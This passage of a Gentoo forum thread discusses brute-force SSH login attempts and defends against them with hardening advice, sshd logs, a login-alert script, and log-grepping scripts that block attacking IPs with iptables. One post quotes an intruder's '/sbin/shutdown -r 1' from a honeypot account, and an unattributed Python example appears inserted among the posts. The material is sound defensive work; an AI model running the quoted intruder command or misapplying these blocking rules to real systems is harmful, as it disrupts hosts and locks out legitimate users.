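        { sub(/[ \t]*=[ \t]*/, " ") }        # accept "Keyword=value"
        NF >= 2 && tolower($1) == want { print $2; exit }   # first one wins
    '
}

# sshd_audit  < sshd_config
# Prints one line per weak setting and returns 1; prints nothing and
# returns 0 when root login and password authentication are both "no".
sshd_audit() {
    cfg=$(cat)
    status=0
    for kw in PermitRootLogin PasswordAuthentication; do
        val=$(printf '%s\n' "$cfg" | sshd_effective "$kw" | tr 'A-Z' 'a-z')
        case "$val" in
            no) ;;
            '') echo "$kw: unset, sshd built-in default applies (set it to no)"
                status=1 ;;
            *)  echo "$kw: effective value is '$val' (first match wins), want no"
                status=1 ;;
        esac
    done
    return $status
}

# Stand-alone demonstration: audit the constructed sample (run with --demo),
# or your own file with:  sshd_audit < /etc/ssh/sshd_config
if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_CONFIG" | sshd_audit
fi
```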

----------

## red-wolf76

 *Zepp wrote:*   

> Don't enable direct root login for ssh, just add whatever user you want, like yours, to the wheel group and then login to that user via ssh and su to root.

 Actually, this seriously sounds like a Good Thing. It's what I do when I access the machines directly to avoid running KDE (or Gnome on another box) as root.

Just for an annoyingly dumb question ( :Embarassed: ), though: Why exactly is allowing root SSH logins while restricting it to a trusted list of IPs a Bad Thing? Is it because of spoofing IPs?

----------

## Zepp

Ya IPs and MAC addresses can be spoofed so it isn't really a great idea to depend on them for security that much :/

----------

## agrippa_cash

My XFS (and therefore X) didn't start a couple days ago, so I went through the logs and saw that someone did a ssh portscan of my computer.  I thought that maybe I was hacked so I booted with an Insert knoppix disk and ran chkrootkit and rkhunter and the second alerted me that signs of GasKit were found on my system.  The positive sign of GasKit was a /dev/dev.  As the second dev had an entire system's worth of devs, I'm inclined to believe that this is an artifact from when I first began messing around with udev.  No rootkit binaries or scripts were found and once I rm -Rf'ed /dev/* the warning disappeared. 

X started fine once I rm'ed /tmp, so I think I may have cut the power on my surge protector too early and maybe some lock file was still in place causing xfs to fail.  At least I hope this is the case.  Your confirmation would be appreciated.

PS:  I have ssh root disabled, and almost no network services running.

----------

## SwiftWind

Holy cow...I checked my logs, there have been so many attempts.  I have no idea how to check if there were any successful ones. For some reason in the SSHD folder it's only keeping logs for the last 2 days. Can someone recommend what logs I should look in for any successful logins? and in what directory?

I want to make sure no one got anything.

Thank you for your time.

----------

## whiskers

 *Captain_Loser wrote:*   

> Wow, I just looked through my logs and found a whole lot of failed ssh logins, and what I guess are rootkit attempts.. I am very surprised to see this many cracking attempts aimed at me. I am running a very safe system, but it makes you think.. I am sure glad gentoo has things like emerge -u.

 

what is a "very safe system" and how can you get it there?

----------

## meu

 *SwiftWind wrote:*   

> Holy cow...I checked my logs, there have been so many attempts.  I have no idea how to check if there were any successful ones. For some reason in the SSHD folder it's only keeping logs for the last 2 days. Can someone recommend what logs I should look in for any successful logins? and in what directory?
> 
> 

 

You can use the `last` command to see users who logged into the system. This can only help if the attacker hasn't got root access, though, in which case he could just change the logs.

----------

## hollywoodcole

 *alex6z wrote:*   

> I have (an) open account(s) on my system. I put them there to see who would login and wait and see what they try to do.  I just don't get why people are so scared.  They shouldn't be able to get root access from the account.  I have it set up with limits and outgoing firewall so they can't use an IRC bot.  So far nothing too interesting has happened .  
> 
> 2005-07-19 my dynamic IP is ssh://admin@12.223.170.28/  try it out.  I know it's risky allowing anonymous shell access, but it's still safer than windows and I really don't care anyway, computers are just toys for me 

 

Nice work alex, I have been checking the bash_history for a while now and am finding some funny things!

i.e. 

```
/sbin/shutdown -r 1
```

----------

## segedunum

 *Quote:*   

> The simple fact is that running any service whatsoever, on any port, is a security hazard. The only truly secure network is the one you don't build, and the only truly secure computer is in a concrete bunker, under armed guard, with console access only, etc. Even then, there are various points of attack one could use to gain access, if one really wanted to. 

 

That's the usual cop-out rubbish I'm afraid. There are certain things you can do to make your system more secure, and piping SSH and other admin tools through a VPN is definitely one of them.

 *Quote:*   

> It is currently fashionable for 1337 $cr!p+ k!ddi3z to hit systems running SSH.

 

Which is why I recommend, not unreasonably, not running SSH and piping it through something else.

 *Quote:*   

> Security-compromising errors have been found before in ipsec-tools, and if one wanted one could probably attempt to mount an attack against IPSec.

 

Is that more or less likely than an attack on a public SSH server resulting in a compromise?

 *Quote:*   

> OpenVPN is a great piece of software (I use it extensively), but I'm sure that a programming error will slip in at some point and that an attack could be devised against it.

 

Yes, and it's far more difficult to mount an attack on this than on a running, publicly available SSH server. It's going to be that much more difficult to find a compromise. It's a question of who's your worst enemy.

 *Quote:*   

> But for right now, SSH is a far more inviting target: so many more people use it

 

Errr, yes - which is why I recommend piping your SSH and other admin tools through a VPN. It's the best, and most secure option. I also think you're misunderstanding things in that you're assuming that if VPN usage gets more popular than SSH then VPNs will be hacked, including Microsoft. That's normal tosh that a lot of people tend to assume. No one claims a VPN is uncompromisable, but having a VPN using a set of secured, signed and trusted certificates is going to be a heck of a lot tougher to have a script-kiddy go at than a public SSH server.

Think about it.

----------

## labrador

 *alex6z wrote:*   

> I have (an) open account(s) on my system. I put them there to see who would login and wait and see what they try to do.  I just don't get why people are so scared.  They shouldn't be able to get root access from the account.  I have it set up with limits and outgoing firewall so they can't use an IRC bot.  So far nothing too interesting has happened .  
> 
> 2005-07-19 my dynamic IP is ssh://admin@12.223.170.28/  try it out.  I know it's risky allowing anonymous shell access, but it's still safer than windows and I really don't care anyway, computers are just toys for me 

 

I was going to take a look but ssh to that box timed out, and nmap says it can't be found with a standard probe.

Have you heard of shell fork bomb attacks?  Did you set up limits to prevent that sort of abuse?  Perhaps that's why I can't get on it?

There is no such thing as "safe" with a system you've set up with no password and advertised to the whole world is wide open.  Would you leave your house unlocked, then publish an ad in the newspaper that such and such an address is not locked?

----------

## christsong84

 *labrador wrote:*   

>  *alex6z wrote:*   I have (an) open account(s) on my system. I put them there to see who would login and wait and see what they try to do.  I just don't get why people are so scared.  They shouldn't be able to get root access from the account.  I have it set up with limits and outgoing firewall so they can't use an IRC bot.  So far nothing too interesting has happened .  
> 
> 2005-07-19 my dynamic IP is ssh://admin@12.223.170.28/  try it out.  I know it's risky allowing anonymous shell access, but it's still safer than windows and I really don't care anyway, computers are just toys for me  
> 
> I was going to take a look but ssh to that box timed out, and nmap says it
> ...

 

Note the date of that post and the fact that it's a dynamic IP (which was stated).  That's probably more the reason you can't get into it...it's somewhere else by now.

----------

## philidias

you need to get hacking preventing software such as zone alarms.  Turn off your internet connection. Scan your computer.

----------

## krazykit

 *philidias wrote:*   

> you need to get hacking preventing software such as zone alarms.  Turn off your internet connection. Scan your computer.

 

Do you have any idea what you said?  "zone alarms" possibly means a Windows software firewall known as ZoneAlarm.  If you're asking to scan our computers with ZoneAlarm (again, Windows software, and it doesn't do this anyway)... Why are you posting advice when you can't even get the OS right?

----------

## bakaohki

I shouldn't even bother to post, because what I'm saying is so trivial: USE A DEDICATED FIREWALL  :Evil or Very Mad: . Everyone out there. You can use Gentoo, Debian, whatever; I prefer FloppyFW with a fanless dumb P1 75mhz (put together from used garbage). And of course use strong passwords and iptables firewalls for the internal machines. Duh. Surfing on the net without a firewall is like walking around in the city without clothes; if you have weak passwords and opened ssh ports, then it means you're a hot babe without clothes in the worst area of the city at midnight waving a sign "kidnap me"...

----------

## audiodef

I think someone may have been trying to use my Gentoo box at my office, after hours. I had it up and running one day, screen locked, and logged out the next day. At best, someone hit the computer's reset button, but where would I look to find out exactly what happened? I know it's probably not a power failure because 1. another computer was still on the way I left it and 2. I don't think the computer is set up to reboot after a power failure.

----------

## jamapii

There is /var/log/syslog

If it was xlock, maybe it crashed.

Maybe someone switched it off for some reason, then changed their mind and switched it on again.

...

----------

## trip

how do you turn off passwd-less logins? and is making a passwd-less account as easy as not typing any when creating the account? sorry for the noob questions but i want to know exactly what to do in the little time i have.  :Very Happy: 

tnx in advance

----------

## quantus

 *trip wrote:*   

> how do you turn off passwd-less logins? and is making a passwd-less account as easy as not typing any when creating the account? sorry for the noob questions but i want to know exactly what to do in the little time i have. :D
> 
> tnx in advance

 

I'm a little fuzzy on your question...  see if this helps you out: Hardening PAM

----------

## nhaggin

Reply a little late to this, but I didn't see it until now....

 *segedunum wrote:*   

>  *Quote:*   The simple fact is that running any service whatsoever, on any port, is a security hazard. The only truly secure network is the one you don't build, and the only truly secure computer is in a concrete bunker, under armed guard, with console access only, etc. Even then, there are various points of attack one could use to gain access, if one really wanted to.  
> 
> That's the usual cop-out rubbish I'm afraid.

 

It might interest you to know that I'm not running a public SSH server, and that I do use OpenVPN to remotely administer my machine.

As to the rest of your reply: I was not attempting to ridicule your advice, nor was I making several of the assumptions you suggested I was; if my choice of language implied that, I apologize. I meant to indicate that, if one hardens one's SSH setup, one can expose it to the Internet, even on port 22, without immediate and grave danger, although there is still some danger present. IOW, it's not completely insane to have publicly-available SSH, although, as you have indicated, certain other systems are more secure.

----------

## robinmdh

```
Oct  2 10:52:23 [sshd] Invalid user anna from 210.6.64.3
Oct  2 10:52:31 [sshd] Invalid user arthur from 210.6.64.3
Oct  2 10:52:38 [sshd] Invalid user aron from 210.6.64.3
Oct  2 10:52:42 [sshd] Invalid user austin from 210.6.64.3
Oct  2 10:52:46 [sshd] Invalid user barbara from 210.6.64.3
Oct  2 10:52:50 [sshd] Invalid user bart from 210.6.64.3
Oct  2 10:52:53 [sshd] Invalid user ben from 210.6.64.3
Oct  2 10:52:57 [sshd] Invalid user beny from 210.6.64.3
Oct  2 10:53:02 [sshd] Invalid user bert from 210.6.64.3
Oct  2 10:53:05 [sshd] Invalid user bill from 210.6.64.3
Oct  2 10:53:13 [sshd] Invalid user bind from 210.6.64.3
Oct  2 10:53:17 [sshd] Invalid user bob from 210.6.64.3
Oct  2 10:53:20 [sshd] Invalid user bobby from 210.6.64.3
Oct  2 10:53:24 [sshd] Invalid user bret from 210.6.64.3
Oct  2 10:53:27 [sshd] Invalid user brian from 210.6.64.3
Oct  2 10:53:31 [sshd] Invalid user bruce from 210.6.64.3
Oct  2 10:53:36 [sshd] Invalid user carl from 210.6.64.3
Oct  2 10:53:39 [sshd] Invalid user carol from 210.6.64.3
Oct  2 10:53:45 [sshd] Invalid user cesar from 210.6.64.3
Oct  2 10:53:48 [sshd] Invalid user clark from 210.6.64.3
Oct  2 10:53:51 [sshd] Invalid user clinton from 210.6.64.3
Oct  2 10:53:55 [sshd] Invalid user corinna from 210.6.64.3
Oct  2 10:53:59 [sshd] Invalid user craig from 210.6.64.3
Oct  2 10:54:02 [sshd] Invalid user daniel from 210.6.64.3
Oct  2 10:54:06 [sshd] Invalid user danny from 210.6.64.3
Oct  2 10:54:11 [sshd] Invalid user dave from 210.6.64.3
Oct  2 10:54:14 [sshd] Invalid user dexter from 210.6.64.3
Oct  2 10:54:18 [sshd] Invalid user dick from 210.6.64.3
Oct  2 10:54:21 [sshd] Invalid user earl from 210.6.64.3
Oct  2 10:54:26 [sshd] Invalid user ed from 210.6.64.3
Oct  2 10:54:30 [sshd] Invalid user eddie from 210.6.64.3
Oct  2 10:54:33 [sshd] Invalid user edgar from 210.6.64.3
Oct  2 10:54:37 [sshd] Invalid user ellen from 210.6.64.3
Oct  2 10:54:40 [sshd] Invalid user emil from 210.6.64.3
Oct  2 10:54:45 [sshd] Invalid user enzo from 210.6.64.3
Oct  2 10:54:48 [sshd] Invalid user felix from 210.6.64.3
Oct  2 10:54:52 [sshd] Invalid user fred from 210.6.64.3
Oct  2 10:54:57 [sshd] Invalid user francis from 210.6.64.3
Oct  2 10:55:02 [sshd] Invalid user harry from 210.6.64.3
Oct  2 10:55:06 [sshd] Invalid user ian from 210.6.64.3
Oct  2 10:55:10 [sshd] Invalid user ismail from 210.6.64.3
Oct  2 10:55:20 [sshd] Invalid user james from 210.6.64.3
Oct  2 10:55:24 [sshd] Invalid user jesse from 210.6.64.3
```

lol

don't think i've been hacked but will step up on security!

----------

## pengatom

I've got 23 000 "Failed password" logins the last 3 months... Changed the ssh port, hopefully it gets better  :Smile: 

In my iptables I've written:

```
iptables -A INPUT -p TCP --dport ssh -i ${WAN} -j ACCEPT
```

would the "ssh" port number change to whatever I set in sshd_conf, or does "ssh" mean port 22?

btw, if I try to set an "easy" password on a user, gentoo tells me this, anyone know what this definition of a "BAD password" is?

----------

## Malcolm

I've gotten a lot of these break-in attempts as well, both through SSH and FTP.  My suggestion is to set up an auto blacklisting script like ssh black.

I've had this setup on my system for 3 days now and the blacklist always has 5-10 IPs, rotating of course  :Smile: 

----------

## Errtu

I got tired of maintaining blacklists, scripts and other stuff to keep 'm out, so i just configured sshd to listen on a higher IP. Since i've done that i get no more of these attempts. And my logfile stays a bit cleaner too  :Smile: 

----------

## Bigun

I just grepped over my log and have about 2,000+ pages of attempts ranging back to August of this year.

All of them lame dictionary attempts.  Does reporting these IPs to their respective ISPs help anything?

----------

## christsong84

 *bigun89 wrote:*   

> I just grepped over my log and have about 2,000+ pages of attempts ranging back to August of this year.
> 
> All of them lame dictionary attempts.  Does reporting these IPs to their respective ISPs help anything?

 

Sometimes but not often.  I generally report those IPs to them anyway...might as well, it can't hurt anything.  I've gotten three ISPs who've actually done something and asked me to let them know if things happen again.  :Smile: 

----------

## oracleofmist

On top of being behind a router firewall that drops all incoming connections except to specified ports w/ specified protocols, I've also taken the liberty of changing my ftp and ssh services to high port numbers. Good practice?

----------

## Bigun

 *oracleofmist wrote:*   

> on top of being behind a router firewall that drops all incoming connections except to specified ports w/ specified protocols I've also taken the liberty of changing my ftp, ssh services to high port numbers. good practice?

 

Ehh... that's more of security by obscurity... but at the very least will keep bot attempts out.

----------

## chrispolderman

Is there a solid way to trace back the IP number in question and obtain the abuse email address for the corresponding ISP, or am I just speaking nonsense here?

Would be a nice script: more than 20 password tries logged and a process would automatically file a complaint to the corresponding ISP...

Is this possible (apart from spoofed IPs of course)..?

Chris

----------

## dsb

My traceroute shows they are coming from China

----------

## shiggity s

Those crazy Chinese hackers

----------

## Cinder6

I've been getting some from South Korea, and a couple that IP locators can't find  :Sad: 

----------

## Monkeh

 *bigun89 wrote:*   

>  *oracleofmist wrote:*   on top of being behind a router firewall that drops all incoming connections except to specified ports w/ specified protocols I've also taken the liberty of changing my ftp, ssh services to high port numbers. good practice? 
> 
> Ehh... that's more of security by obscurity... but at the very least will keep bot attempts out.

 

There's nothing wrong with security by obscurity, in fact it's a good practice. Just don't rely on it.

----------

## heartburn

I'm not sure if it's been mentioned yet on this thread (it's a very long thread). But you can configure sshd to use DSA authentication instead of PasswordAuthentication. Then, a cracker would need an existing user's private key to use ssh.

You can find the instructions here:

http://www.gentoo.org/doc/en/articles/openssh-key-management-p1.xml?style=printable

Also, logwatch makes a nice daily report of login attempts:

```
--------------------- SSHD Begin ------------------------ 

 Didn't receive an ident from these IPs:
    xxx.xxx.com (xxx.xxx.xxx.xxx): 1 Time(s)
    xxx.xxx.com (xxx.xxx.xxx.xxx): 1 Time(s)
    xxx.xxx.com (xxx.xxx.xxx.xxx): 1 Time(s)

 Failed logins from these:
    invalid user admin (password) from ::ffff:xxx.xxx.xxx.xxx: 1 Time(s)
    invalid user administrator (password) from ::ffff:xxx.xxx.xxx.xxx: 1 Time(s)
    invalid user carol (password) from ::ffff:xxx.xxx.xxx.xxx: 2 Time(s)
    invalid user jack (password) from ::ffff:xxx.xxx.xxx.xxx: 1 Time(s)
    invalid user marvin (password) from ::ffff:xxx.xxx.xxx.xxx: 1 Time(s)
    root/password from ::ffff:xxx.xxx.xxx.xxx: 31 Time(s)

 Users logging in through sshd:
    jblow:
       xxx.xxx.net (xxx.xxx.xxx.xxx): 4 times

 ---------------------- SSHD End -------------------------  
```

I also have a script to page me when someone successfully logs on through ssh. That's not too practical if you have lots of users. But it's good if you aren't expecting any logins. I think I stole this script from somewhere else in this forum (my apologies to its author).

```
#!/bin/bash
# Send a brief alert with connection details
#
# Runs in the login environment, where sshd has set SSH_CONNECTION,
# SSH_TTY and USER. ${address:0:1} below is a bash-ism, hence bash.
when=`/usr/bin/date`
# SSH_CONNECTION is "client_ip client_port server_ip server_port"; the
# second cut strips a ::ffff: prefix and leaves a plain IPv4 untouched
# (cut passes lines through when the delimiter is absent).
where=`echo $SSH_CONNECTION|cut -f1 -d' '|cut -f4 -d:`
if [ -z "$SSH_TTY" ] ; then
  what="Connect by $USER"
else
  what="Login by $USER on $SSH_TTY"
fi

# Recipients come from /etc/ssh/notify, one "address [cc|bcc]" per line;
# blank lines and lines starting with # are skipped.
mailto=""
cc_to=""
bcc_to=""
while read address mode
do
  if [ -z "$address" -o "${address:0:1}" = "#" ] ; then continue; fi
  if [ "x$mode" = "xcc" -o "x$mode" = "xCC" ] ; then
    cc_to=${cc_to:+${cc_to},}$address
  elif [ "x$mode" = "xbcc" -o "x$mode" = "xBCC" ] ; then
    bcc_to=${bcc_to:+${bcc_to},}$address
  else
    mailto=${mailto:+${mailto},}$address
  fi
done </etc/ssh/notify

# Fall back to "operator" if the file names no primary recipient
mailto=${mailto:-operator}
cc_to=${cc_to:+"-c $cc_to"}
bcc_to=${bcc_to:+"-b $bcc_to"}
mail ${cc_to} ${bcc_to} -s "SSH Alert" ${mailto} >&2 <<-EOM
  ${what} from ${where} at ${when}
EOM
```

~~~~~EDIT~~~~~

I just did a search and it seems that I stole the script from timeBandit. He has written an excellent HOW-TO about it here:

https://forums.gentoo.org/viewtopic-t-393795-highlight-send+brief+alert+connection+details.html

Last edited by heartburn on Thu Nov 03, 2005 11:28 pm; edited 1 time in total

----------

## abaelinor

aa

Last edited by abaelinor on Tue Oct 21, 2008 4:28 am; edited 1 time in total

----------

## heartburn

like I said, I stole it from timeBandit. He deserves the credit. But I've been using it for about two weeks and it works great. I love hearing my phone make a satisfying chirp every time I log on. And I like hearing nothing when I'm not logging on even better  :Smile: 

----------

## d11wtq

Hopefully I've not missed something... I just read 16 pages of thread very quickly.  What a great thread!

I run a web server.  I'm not being paranoid but this has made me think a lot about security considerations.  One thing that worries me is that I have set up user accounts for friends & family on my server (shell accounts/ftp/virtualhost apache accounts) so they can host websites too.

Everyone seems to only be mentioning SSH attacks... all of my users (most know virtually nothing about *nix) have shell access by SSH.  The worrying thing is that I'm relying upon them to use secure passwords too now. How can I force increased password security?  I want them all to login and do a passwd, then I want passwd to make sure their passwords:

a) Contain at least 8 characters

b) Contain at least 2 numbers

c) Contain a mixture of uppercase and lowercase letters

passwd already forces at least *6* chars but the rest is perfectly allowed  :Sad: 

I'm amazed we're only discussing SSH.  Is FTP any security risk? It uses the same passwords as the shell access and all users are chrooted to their home directory.  Hell... I've even been told you can compromise a box by telnetting to port 80 (HTTP) and doing some magic  :Confused: 

I've already installed and changed a few configs during the course of this thread... I may as well do this extra thing with the passwords too.  I'll run a "last" command every so often so that users who aren't using SSH have their access removed temporarily too.  They'd just get a message upon successful login which says that they need to contact me to have their access re-enabled and then it disconnects again.

Password criteria help anyone?

----------

## Errtu

d11wtq:

Just doing some searching on freshmeat gives these projects:

http://freshmeat.net/projects/pam_pwcheck/

- The pam_pwcheck is a PAM module for password strength checking

http://freshmeat.net/projects/pam_passwdqc/

- pam_passwdqc is a simple password strength checking module for PAM-aware password changing programs, such as passwd(1). 

Maybe one of these could be of help?

Leon

----------

## d11wtq

Thanks. I've emerged pam_passwdqc so that should help. I haven't set it up yet but it looks simple enough  :Very Happy: 

----------

## iothal

Perhaps this can be of use to somebody.

Caveat, I'm not a good scripter...

cronjob:

```
#!/bin/sh
# Collect source addresses from the two sshd message types we care about.
# With the classic syslog layout ("Mon DD HH:MM:SS host sshd[pid]: ...")
# the address is field 10 of "Invalid user X from IP" and field 11 of
# "Failed password for root from IP port N ssh2".
# NB: fixed file names under /tmp are a symlink-race risk for a root cron
# job; mktemp(1) is the safer choice if you adapt this.
grep "Invalid user" /var/log/auth.log | gawk '{print $10}'|sort -u > /tmp/drop
grep "Failed password for root from" /var/log/auth.log | gawk '{print $11}'|sort -u >> /tmp/drop
cat /etc/badips >> /tmp/drop
sort -u /tmp/drop > /tmp/dropu
#Compare dropu and badips, only drop
#members who are in dropu but not in badips
#Drop them
/sbin/drop.pl
cp /tmp/dropu /etc/badips
rm /tmp/drop
rm /tmp/dropu
```

perlscript:

```
#!/usr/bin/perl -w
use strict;

# point to wherever you keep /sbin/iptables
my $iptables='/sbin/iptables';
my $alreadyBlocked = '/etc/badips';
my $couldBeAssholes = '/tmp/dropu';

#Sanity check
open(BLOCKED, $alreadyBlocked) || die("Could not open block file!");
open(NEW, $couldBeAssholes) || die("Could not open prospects file!");

#Read could be assholes and if not found in alreadyblocked
#yeah... smack them!
my @blocked = <BLOCKED>;
my @new = <NEW>;
close(BLOCKED);
close(NEW);
chomp(@blocked, @new);          # compare without trailing newlines

my %seen;                       # lookup table for already blocked
my @notblocked;                 # not already blocked

# build lookup table
foreach my $item (@blocked) { $seen{$item} = 1 }
foreach my $entry (@new)
{
        push(@notblocked,$entry) unless $seen{$entry};
        $seen{$entry} = 1;
}

my $block="32";
my $target = "NOLOGDUMP";
my $chain = "INPUT";
my $inf = "eth0";

foreach my $entry (@notblocked)
{
        # These tokens came out of a log file. Only a dotted quad goes to
        # iptables; anything else (an IPv4-mapped ::ffff: form, or some
        # stray field) is skipped rather than handed to a root shell.
        next unless $entry =~ /^\d{1,3}(?:\.\d{1,3}){3}$/;
        #print "Dropping: ".$entry."\n";
        # list form of system(): no shell, no word splitting
        system($iptables, '-A', $chain, '-i', $inf, '-s', "$entry/$block", '-j', $target);
}
```

iptables (stolen from a previous post in this thread):

```
#Chain to drop script kiddies
iptables -N NOLOGDUMP 2> /dev/null
iptables -F NOLOGDUMP
iptables -A NOLOGDUMP -p tcp -j REJECT --reject-with tcp-reset
iptables -A NOLOGDUMP -p udp -j REJECT --reject-with icmp-port-unreachable
iptables -A NOLOGDUMP -j DROP
```

Oh, and you probably need to touch /etc/badips before the first run.

Enjoy!
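An added example of the same log-to-blocklist step in Python (not iothal's script, nor any tool named in this thread), run over constructed auth.log lines: it matches on the sshd message text rather than on awk field numbers, unwraps the ::ffff: form that shows up in the logwatch report above, counts per address so a single mistyped login does not earn a block, diffs against an existing /etc/badips-style list, and builds the rule as an argv list instead of a shell string. The threshold, the sample addresses and the file names are assumptions.

```python
"""Log-to-blocklist step from the thread's cron job, as a checked parser.

Added example, not iothal's script or any tool named in the thread. The
auth.log lines below are constructed (RFC 5737 documentation addresses).
"""
import ipaddress
import re
from collections import Counter

# The two sshd message forms the thread's cron job greps for. Anchoring on
# the message text (not on whitespace-separated field numbers) keeps an odd
# username from shifting which token is taken as the address.
INVALID_USER = re.compile(r"sshd\[\d+\]: Invalid user .* from (\S+)(?: port \d+)?$")
FAILED_ROOT = re.compile(r"sshd\[\d+\]: Failed password for root from (\S+) port \d+")

# Constructed sample log; 203.0.113.7 appears both plain and as ::ffff:... .
SAMPLE_LOG = """\
Nov  3 22:10:01 box sshd[4120]: Invalid user admin from 203.0.113.7
Nov  3 22:10:03 box sshd[4122]: Invalid user test from 203.0.113.7
Nov  3 22:10:05 box sshd[4124]: Failed password for root from 203.0.113.7 port 40122 ssh2
Nov  3 22:10:06 box sshd[4126]: Failed password for root from 203.0.113.7 port 40130 ssh2
Nov  3 22:10:08 box sshd[4128]: Invalid user carol from ::ffff:203.0.113.7
Nov  3 22:11:40 box sshd[4131]: Invalid user jblo from 198.51.100.20
Nov  3 22:12:00 box sshd[4133]: Failed password for root from ::ffff:192.0.2.9 port 51000 ssh2
Nov  3 22:12:01 box sshd[4135]: Accepted publickey for jblow from 198.51.100.20 port 50011 ssh2
Nov  3 22:12:02 box sshd[4140]: Invalid user a from b from 192.0.2.55
""".splitlines()


def normalize_ip(token):
    """Canonical address string, with ::ffff:a.b.c.d unwrapped to a.b.c.d;
    None for anything that is not an address (so it never reaches iptables)."""
    try:
        addr = ipaddress.ip_address(token.strip())
    except ValueError:
        return None
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return str(addr)


def count_offenders(lines):
    """Failed-login count per source address over the given log lines."""
    counts = Counter()
    for line in lines:
        m = INVALID_USER.search(line) or FAILED_ROOT.search(line)
        if m is None:
            continue
        ip = normalize_ip(m.group(1))
        if ip is not None:
            counts[ip] += 1
    return counts


def new_blocks(lines, already_blocked, threshold=5):
    """Addresses at or above threshold that are not yet in the blocklist.

    The threshold is the difference from the thread's script, which blocks
    on a single 'Invalid user' line; one mistyped username should not cost
    a legitimate user their access."""
    known = {normalize_ip(t) for t in already_blocked} - {None}
    counts = count_offenders(lines)
    return sorted(ip for ip, n in counts.items() if n >= threshold and ip not in known)


def iptables_args(ip, chain="INPUT", iface="eth0", target="NOLOGDUMP"):
    """argv for the rule the thread's perl script builds, as a list so it can
    be passed to subprocess without a shell; IPv6 goes to ip6tables with /128."""
    addr = ipaddress.ip_address(ip)
    binary = "/sbin/ip6tables" if addr.version == 6 else "/sbin/iptables"
    host_prefix = f"{addr}/{addr.max_prefixlen}"
    return [binary, "-A", chain, "-i", iface, "-s", host_prefix, "-j", target]


if __name__ == "__main__":
    # Dry run: show what would be appended to the chain, without running it.
    for ip in new_blocks(SAMPLE_LOG, already_blocked=["192.0.2.9"], threshold=5):
        print(" ".join(iptables_args(ip)))
```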

----------

## assaf

LOL @ this thread... Good thing i'm running sshd on port xyxyx...   :Rolling Eyes: 

----------

## sloof3

We've all done it before but there is already a better tool to check the logs for failed logins: http://denyhosts.sourceforge.net/

----------

## LostControl

 *sloof3 wrote:*   

> We've all done it before but there is already a better tool to check the logs for failed logins: http://denyhosts.sourceforge.net/

 

And do not forget Fail2ban  :Wink:  It is now in Portage.

----------

## blommethomas

just read through a few messages of this thread.

I'm not a professional, but I'm installing LINUX now.

My dad has got a LINUX comp already and he was informed by e-mail about attempts to connect to the Internet, anyone knows more about this?

----------

## fuzzythebear

This thread (and by jove was it long to read it all.. ;) ) we've seen a lot about remote logins and ssh.. but, and this might be good for a new thread, how about physical security?

If the attacker is in fact a thief coming in and stealing a disk in a tray or stealing the machine? How would we be able to make sure that the data would be safe from prying eyes..

Ex. we all know that the OS need not be running on a particular disk to be able to read it and use it..

How would we go about to protect the data in that kind of an occurrence? Is it possible to make the data unreadable without a floppy in the drive? A small usb key or something else I have no clue about?

In fact.. once the disk is out of the machine, is there any way at all to protect the data?

Fuzzy

----------

## heartburn

fuzzythebear,

that's why god created data centers. Physical security is just that: physical. Sure, there's encryption... maybe even self-destruction. But nothing beats a few well-trained, highly paid, professional armed guards standing outside the 6-inch thick, retina-scanning steel doors of a natural-disaster-proof, underground building complete with around-the-clock video surveillance and an identically equipped backup facility on another continent. Or, you could just lock the machine in the basement. I guess it all depends on what you're trying to protect. But if you're worried about people who actually come in contact with the machine, you need to think physical. Software solutions will be secondary.

d11wtq,

You really should read about the DSA authentication.

http://www.gentoo.org/doc/en/articles/openssh-key-management-p1.xml?style=printable

You can configure your machine to use DSA authentication instead of PAM. Then, passwords are almost a non-issue. Nobody can even get to a login prompt without a valid private key. After I set up DSA-only authentication on my webserver, I went from literally hundreds of failed login attempts per day to zero (not counting my own fat-fingered passphrase misspellings). It's definitely worth it.

- mark

----------

## heartburn

One more thing I did recently was set up a daily cron job to emerge and run chkrootkit. I know that many people run chkrootkit as a cron job, but I was thinking that if I was cracking a system, I might want to replace chkrootkit with a script that produces a false report. So I figured the best thing to do is rebuild it right before I run it each time. I suppose that could be faked too. Unfortunately, my machine is hosted so I don't have the option of putting an unwritable version in the CD drive. Any thoughts?

I also started running psad. That's the port scan detection system configured by bastille. It looks pretty good, but I can't find very much information about it on the web. Is anyone else using it? Does anyone have any tips on configuring it?

 - mark

----------

## mutlu_inek

 *fuzzythebear wrote:*   

> Is it possible to make the data unreadable

 

How about encryption?

E.g. http://gentoo-wiki.com/SECURITY_System_Encryption_DM-Crypt_with_LUKS (or forum search)

added:

http://gentoo-wiki.com/SECURITY_FileSystem_Encryption_without_ROOT

http://gentoo-wiki.com/HOWTO_Encrypt_Your_Home_Directory_Using_CFS

----------

## AmosMutke

 *heartburn wrote:*   

> One more thing I did recently was set to set up a daily cron job to emerge and run chkrootkit. I know that many people run chkrootkit as a cron job, but I was thinking that if I was cracking a system, I might want to replace chkrootkit with a script that produces a false report. So I figured the best thing to do is rebuild it right before I run it each time. I suppose that could be faked too. Unfortunately, my machine is hosted so I don't have the option of putting an unwritable version in the CD drive. Any thoughts?
> 
> 

 

would mounting a partition read-only have the same effect as a cdrom?  Are there any additional security risks since the media isn't physically read-only?  Clearly, even root can't force data to write on a normal CD.

maybe this could be a viable option for people who don't have a cdrom drive on their system.

----------

## MrUlterior

 *heartburn wrote:*   

> One more thing I did recently was set to set up a daily cron job to emerge and run chkrootkit. I know that many people run chkrootkit as a cron job, but I was thinking that if I was cracking a system, I might want to replace chkrootkit with a script that produces a false report. So I figured the best thing to do is rebuild it right before I run it each time. I suppose that could be faked too. Unfortunately, my machine is hosted so I don't have the option of putting an unwritable version in the CD drive. Any thoughts?
> 
> I also started running psad. That's the port scan detection system configured by bastille. It looks pretty good, but I can't find very much information about it on the web. Is anyone else using it? Does anyone have any tips on configuring it?
> 
>  - mark

 

That's a waste of time, last I checked chkrootkit depends on external binaries, if these are compromised, regardless of how often you rebuild chkrootkit, the results will be false. Unless you want to re-emerge your base system before each test.

Why not just use tripwire/aide/swatch/whatever and monitor your binaries for changes? If you're a good *nix citizen you've mounted every other location "noexec" so besides /bin & /usr there's nowhere else a rootkit could install & execute its components. Actually more likely you've done the usual one partition for "/" and everything on it ... I'm not going to get into that discussion again tho  :Smile: 

----------

## yottabit

28,036 unsuccessful attempts in one month... Unreal.

